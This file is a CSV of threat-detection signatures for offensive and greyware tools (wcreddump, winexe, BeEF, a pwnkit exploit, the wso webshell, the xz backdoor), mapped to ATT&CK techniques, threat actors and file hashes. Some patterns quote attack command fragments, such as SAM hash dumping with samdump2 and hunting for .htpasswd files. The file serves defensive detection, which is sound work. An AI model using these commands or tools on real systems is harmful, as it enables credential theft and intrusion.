"*/wcreddump.py*",".{0,1000}\/wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*/WINHELLO2hashcat.py*",".{0,1000}\/WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*\wcreddump.py*",".{0,1000}\\wcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*\WINHELLO2hashcat.py*",".{0,1000}\\WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*wg-quick down ./tunnel.conf*",".{0,1000}wg\-quick\sdown\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*wg-quick up ./tunnel.conf*",".{0,1000}wg\-quick\sup\s\.\/tunnel\.conf.{0,1000}","greyware_tool_keyword","tunnel","SSL-terminated ephemeral HTTP tunnels to your local machine","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://gitlab.com/pyjam.as/tunnel","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*while * do mv *GCONV_PATH=./value* done",".{0,1000}while\s.{0,1000}\sdo\smv\s.{0,1000}GCONV_PATH\=\.\/value.{0,1000}\sdone","offensive_tool_keyword","POC","Exploit for the pwnkit vulnerability (https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt) from the Qualys team","T1068","TA0004","N/A","N/A","Exploitation tool","https://github.com/Ayrx/CVE-2021-4034 ","1","0","#linux","N/A","N/A","1","93","14","2022-01-27T11:57:05Z","2022-01-26T03:33:47Z"
"*find . -type f -name .htpasswd*",".{0,1000}find\s\.\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1*",".{0,1000}0d33356f9addc458bf9fc3861d9cafef954a51b66412b1cfc435eede351733f1.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#filehash #linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*samdump2 SYSTEM SAM*",".{0,1000}samdump2\sSYSTEM\sSAM.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*find / -type f -name .htpasswd*",".{0,1000}find\s\/\s\-type\sf\s\-name\s\.htpasswd.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 - TA0007","N/A","EMBER BEAR - Sandworm","Discovery","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#linux","find commands used by the webshell","5","4","351","214","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z"
"*succesfully dumped SAM's hash.es to *",".{0,1000}succesfully\sdumped\sSAM\'s\shash\.es\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*succesfully dumped WINHELLO pin.s to *",".{0,1000}succesfully\sdumped\sWINHELLO\spin\.s\sto\s.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*truerustyy/wcreddump*",".{0,1000}truerustyy\/wcreddump.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*/kalilinux/packages/winexe*",".{0,1000}\/kalilinux\/packages\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*/winexe *--runas*",".{0,1000}\/winexe\s.{0,1000}\-\-runas.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*/winexe -U *",".{0,1000}\/winexe\s\-U\s.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*/winexe.git*",".{0,1000}\/winexe\.git.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*/winexe-0.91.tar.gz*",".{0,1000}\/winexe\-0\.91\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*/winexe-1.00.tar.gz*",".{0,1000}\/winexe\-1\.00\.tar\.gz.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358*",".{0,1000}2077c0c96383793ffa5b0843740f9b095688df5f5accd1a74c65f634bbc42358.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2*",".{0,1000}60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e*",".{0,1000}99238bd3e1c0637041c737c86a05bd73a9375abc9794dca71d2765e22d87537e.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*apt install winexe*",".{0,1000}apt\sinstall\swinexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*https://sourceforge.net/projects/winexe*",".{0,1000}https\:\/\/sourceforge\.net\/projects\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*skalkoto/winexe*",".{0,1000}skalkoto\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*winexesvc32.exe*",".{0,1000}winexesvc32\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*Yourman.sh Mini Shell*",".{0,1000}Yourman\.sh\sMini\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","#linux","php title webshell","7","10","2323","385","2024-12-07T02:28:34Z","2020-05-13T11:28:52Z"
"*winexesvc64.exe*",".{0,1000}winexesvc64\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A"
"*yolAbejyiejuvnup=Evjtgvsh5okmkAvj*",".{0,1000}yolAbejyiejuvnup\=Evjtgvsh5okmkAvj.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","#linux","rule author: Elastic Security - link: https://raw.githubusercontent.com/elastic/protections-artifacts/main/yara/rules/Linux_Trojan_XZBackdoor.yar","10","10","N/A","N/A","N/A","N/A"
"./beef","\.\/beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","9901","2189","2024-12-04T13:45:21Z","2011-11-23T06:53:25Z"
"./radare *","\.\/radare\s.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","0","#linux","N/A","N/A","4","356","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z"
"sudomy -*","sudomy\s\-.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","#linux","N/A","N/A","10","2024","381","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z"